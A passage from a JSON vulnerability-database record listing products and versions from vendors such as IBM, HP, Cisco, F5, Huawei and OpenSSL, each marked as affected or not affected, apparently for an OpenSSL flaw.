}, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.13" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "security network intrusion prevention system gx7800", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.4" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "vtm v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "logcenter v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5500t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "dynamic system analysis", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "puredata system for operational analytics a1791", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "usg2000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dsm v100r002c05spc615", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "espace u2980 v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s7700\u0026s9700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ecns600 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "icewall sso certd r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "oceanstor s2600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u19** v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.20" }, { "model": "project openssl 1.0.1h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.5" }, { "model": "paging server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "oceanstor s5600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "ace application control engine module ace20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.2" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "psb email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "10.00" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.1880" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.3" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.10" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.2354" }, { "model": "agent desktop for cisco unified contact center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "toolscenter suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.53" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence ip vcr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "unified communications series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "8.4-release-p12", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "netcool/system service monitor fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.014" }, { "model": "hyperdp v200r001c91spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dsr-500 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "s3900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "documentum content server sp1 p26", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.6" }, { "model": "security information and event management hf11", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.3.2" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "ftp server", "scope": "ne", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.3" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "eupp v100r001c01spc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ace application control engine module ace10", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "ecns600 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "oceanstor s2600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.12" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463011.5" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ave2000 v100r001c00sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security information and event management ga", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.4.0" }, { "model": "svn2200 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "esight-ewl v300r001c10spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ave2000 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "usg9500 v300r001c01spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "fortios b064", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-1" }, { "model": "documentum content server sp2 p15", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "usg9500 v300r001c20sph102", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "fortios", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.8" }, { "model": "asa cx context-aware security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "unified im and presence services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "8.4-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "usg9300 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gv200", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "elog v100r003c01spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "anyoffice v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.5" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.6" }, { "model": "vpn client v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "metro ethernet series access devices", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "12000" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "s5900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s6900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ecns610 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.0" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "9.2-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "fusionsphere v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.1" }, { "model": "usg9500 usg9500 v300r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tsm v100r002c07spc219", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "protection service for email", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.5" }, { "model": "espace iad v300r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "ace application control engine appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "documentum content server sp1 p28", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.3" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "stunnel", "scope": "eq", "trust": 0.3, "vendor": "stunnel", "version": "5.01" }, { "model": "oceanstor s5600t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace iad v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "oceanstor s6800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "manageone v100r001c02 spc901", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-2" }, { "model": "tivoli network manager ip edition fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.94" }, { "model": "project openssl 1.0.0m", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "oceanstor s2600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "dsr-500n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s2750\u0026s5700\u0026s6700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "11.00" }, { "model": "oceanstor s5800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "psb email and server security", "scope": "eq", 